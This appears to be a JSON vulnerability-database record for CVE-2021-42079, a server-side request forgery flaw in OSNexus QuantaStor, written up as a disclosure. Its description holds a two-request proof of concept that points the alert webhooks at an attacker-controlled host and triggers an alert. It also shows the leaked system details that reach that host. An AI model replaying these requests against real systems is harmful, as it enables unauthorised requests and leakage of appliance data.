'curl/7.58.0', <br>\u2003\u2003'Accept': '*/*', <br>\u2003\u2003'Content-Type': 'application/json', <br>\u2003\u2003'Content-Length': '790'\n<br>\u2003}, <br>\u2003'args': ImmutableMultiDict([]), <br>\u2003'form': ImmutableMultiDict([]), <br>\u2003'remote_addr': '217.103.63.173', <br>\u2003'path': '/payload/58', <br>\u2003'whois_ip': 'TNF-AS, NL'<br>}\n<br>#### END FLASK REQUEST STUFF #####</span><tt></tt>", "base64": false}]}], "problemTypes": [{"descriptions": [{"lang": "en", "type": "CWE", "cweId": "CWE-918", "description": "CWE-918 Server-Side Request Forgery (SSRF)"}]}], "providerMetadata": {"orgId": "b87402ff-ae37-4194-9dae-31abdbd6f217", "shortName": "DIVD", "dateUpdated": "2025-09-22T06:40:03.059Z"}}}, "cveMetadata": {"cveId": "CVE-2021-42079", "state": "PUBLISHED", "dateUpdated": "2025-09-22T06:40:03.059Z", "dateReserved": "2021-10-07T17:12:57.677Z", "assignerOrgId": "b87402ff-ae37-4194-9dae-31abdbd6f217", "datePublished": "2023-07-10T06:29:48.339Z", "assignerShortName": "DIVD"}, "dataVersion": "5.1"}

{"configurations": [{"nodes": [{"cpeMatch": [{"criteria": "cpe:2.3:a:osnexus:quantastor:*:*:*:*:*:*:*:*", "matchCriteriaId": "5E101217-36C7-4C28-8C61-7744481D2D0E", "versionEndExcluding": "6.0.0.355", "vulnerable": true}], "negate": false, "operator": "OR"}]}], "cveTags": [], "descriptions": [{"lang": "en", "value": "An authenticated administrator is able to prepare an alert that is able to execute an SSRF attack. This is exclusively with POST requests.\n\nPOC\n\nStep 1: Prepare the SSRF with a request like this:\n\nGET /qstorapi/alertConfigSet?senderEmailAddress=a&smtpServerIpAddress=BURPCOLLABHOST&smtpServerPort=25&smtpUsername=a&smtpPassword=1&smtpAuthType=1&customerSupportEmailAddress=1&poolFreeSpaceWarningThreshold=1&poolFreeSpaceAlertThreshold=1&poolFreeSpaceCriticalAlertThreshold=1&pagerDutyServiceKey=1&slackWebhookUrl=http://<target>&enableAlertTypes&enableAlertTypes=1&disableAlertTypes=1&pauseAlertTypes=1&mattermostWebhookUrl=http://<TARGET>\nHTTP/1.1\n\nHost: <HOSTNAME> \nAccept-Encoding: gzip, deflate\n\nAccept: */*\nAccept-Language: en\n\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.114 Safari/537.36\n\nConnection: close\n\nauthorization: Basic <BASIC_AUTH_HASH> \nContent-Type: application/json\n\nContent-Length: 0\n\nStep 2: Trigger this alert with this request\n\nGET /qstorapi/alertRaise?title=test&message=test&severity=1 \nHTTP/1.1\n\nHost: <HOSTNAME> \nAccept-Encoding: gzip, deflate\n\nAccept: */*\n\nAccept-Language: en\n\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.114 Safari/537.36\n\nConnection: close\n\nauthorization: Basic <BASIC_AUTH_HASH> \nContent-Type: application/json\n\nContent-Length: 1\n\nThe post request received by <TARGET> looks like this:\n{\n\u2003\n### Python FLASK stuff ####\n\n\u2003'endpoint': 'index', \n\u2003\n'method': 'POST', \n\u2003\n'cookies': ImmutableMultiDict([]), \n\u2003\n### END Python FLASK stuff ####\n\n\u2003\n'data': b'{ \n\u2003\u2003\"attachments\": [ \n\u2003\u2003\u2003{\n\n\u2003\u2003\u2003\u2003\"fallback\": \"[122] test / test.\",\n\n\u2003\u2003\u2003\u2003\"color\": \"#aa2222\",\n\n\u2003\u2003\u2003\u2003\"title\": \"[122] test\",\n\n\u2003\u2003\u2003\u2003\"text\": \"test\",\n\n\u2003\u2003\u2003\u2003\"fields\": [ \u00a0 \n\u2003\u2003\u2003\u2003\u2003{ \u00a0 \u00a0\n\n\u2003\u2003\u2003\u2003\u2003\u2003\"title\": \"Alert Severity\",\n \u00a0 \u00a0\n\u2003\u2003\u2003\u2003\u2003\u2003\"value\": \"CRITICAL\",\n \u00a0 \u00a0\n\u2003\u2003\u2003\u2003\u2003\u2003\"short\": false \u00a0\n\u2003\u2003\u2003\u2003\u2003}, \u00a0{ \u00a0 \n\u2003\u2003\u2003\u2003\u2003\u2003\"title\": \"Appliance\", \u00a0 \u00a0 \n\u2003\u2003\u2003\u2003\u2003\u2003\"value\": \"quantastor (https://<HOSTNAME>)\",\n \u00a0 \u00a0 \n\u2003\u2003\u2003\u2003\u2003\u2003\"short\": true \u00a0\n\n\u2003\u2003\u2003\u2003\u2003}, \u00a0{ \u00a0 \u00a0\n\n\u2003\u2003\u2003\u2003\u2003\u2003\"title\": \"System / Driver / Kernel Ver\", \u00a0 \u00a0\n\n\u2003\u2003\u2003\u2003\u2003\u2003\"value\": \"5.10.0.156+a25eaacef / scst-3.5.0-pre / 5.3.0-62-generic\", \u00a0 \u00a0\n\n\u2003\u2003\u2003\u2003\u2003\u2003\"short\": false \u00a0\n\n\u2003\u2003\u2003\u2003\u2003}, \u00a0{ \u00a0 \u00a0\n\n\u2003\u2003\u2003\u2003\u2003\u2003\"title\": \"System Startup\", \u00a0 \u00a0\n\n\u2003\u2003\u2003\u2003\u2003\u2003\"value\": \"Fri Aug \u00a06 16-02-55 2021\", \u00a0 \u00a0\n\n\u2003\u2003\u2003\u2003\u2003\u2003\"short\": true \u00a0\n\n\u2003\u2003\u2003\u2003\u2003 }, \u00a0{ \u00a0 \u00a0\n\n\u2003\u2003\u2003\u2003\u2003\u2003\"title\": \"SSID\", \u00a0 \u00a0\n\n\u2003\u2003\u2003\u2003\u2003\u2003\"value\": \"f4823762-1dd1-1333-47a0-6238c474a7e7\", \u00a0 \u00a0\n\n\u2003\u2003\u2003\u2003\u2003\u2003\"short\": true \u00a0\n\n\u2003\u2003\u2003\u2003\u2003},\n\u2003\u2003\u2003\u2003],\n\n\u2003\u2003\u2003\u2003\"footer\": \"QuantaStor Call-home Alert\",\n\n\u2003\u2003\u2003\u2003\"footer_icon\": \" https://platform.slack-edge.com/img/default_application_icon.png \",\n\n\u2003\u2003\u2003\u2003\"ts\": 1628461774\n\u2003\u2003\u2003}\n\u2003\u2003], \n\u2003\u2003\"mrkdwn\":true \n\u2003}', \n\u2003#### FLASK REQUEST STUFF #####\n\n\u2003'headers': {\n\n\u2003\u2003'Host': '<redacted>', \n\u2003\u2003'User-Agent': 'curl/7.58.0', \n\u2003\u2003'Accept': '*/*', \n\u2003\u2003'Content-Type': 'application/json', \n\u2003\u2003'Content-Length': '790'\n\n\u2003}, \n\u2003'args': ImmutableMultiDict([]), \n\u2003'form': ImmutableMultiDict([]), \n\u2003'remote_addr': '217.103.63.173', \n\u2003'path': '/payload/58', \n\u2003'whois_ip': 'TNF-AS, NL'\n}\n\n#### END FLASK REQUEST STUFF #####"}], "id": "CVE-2021-42079", "lastModified": "2025-09-22T07:15:38.950", "metrics": {"cvssMetricV31": [{"cvssData": {"attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 6.2, "baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "privilegesRequired": "HIGH", "scope": "CHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:H/I:N/A:N", "version": "3.1"}, "exploitabilityScore": 1.7, "impactScore": 4.0, "source": "csirt@divd.nl", "type": "Secondary"}, {"cvssData": {"attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 4.9, "baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "privilegesRequired": "HIGH", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:N/A:N", "version": "3.1"}, "exploitabilityScore": 1.2, "impactScore": 3.6, "source": "nvd@nist.gov", "type": "Primary"}]}, "published": "2023-07-10T16:15:47.467", "references": [{"source": "csirt@divd.nl", "url": "https://cisrt.divd.nl/DIVD-2021-00020/"}, {"source": "csirt@divd.nl", "tags": ["Third Party Advisory"], "url": "https://csirt.divd.nl/CVE-2021-42079"}, {"source": "csirt@divd.nl", "tags": ["Product"], "url": "https://www.osnexus.com/products/software-defined-storage"}, {"source": "csirt@divd.nl", "tags": ["Third Party Advisory"], "url": "https://www.wbsec.nl/osnexus"}, {"source": "af854a3a-2127-422b-91ae-364da2661108", "tags": ["Third Party Advisory"], "url": "https://csirt.divd.nl/CVE-2021-42079"}, {"source": "af854a3a-2127-422b-91ae-364da2661108", "url": "https://www.divd.nl/DIVD-2021-00020"}, {"source": "af854a3a-2127-422b-91ae-364da2661108", "tags": ["Product"], "url": "https://www.osnexus.com/products/software-defined-storage"}, {"source": "af854a3a-2127-422b-91ae-364da2661108", "tags": ["Third Party Advisory"], "url": "https://www.wbsec.nl/osnexus"}], "sourceIdentifier": "csirt@divd.nl", "vulnStatus": "Modified", "weaknesses": [{"description": [{"lang": "en", "value": "CWE-918"}], "source": "csirt@divd.nl", "type": "Secondary"}, {"description": [{"lang": "en", "value": "CWE-918"}], "source": "nvd@nist.gov", "type": "Primary"}]}

{}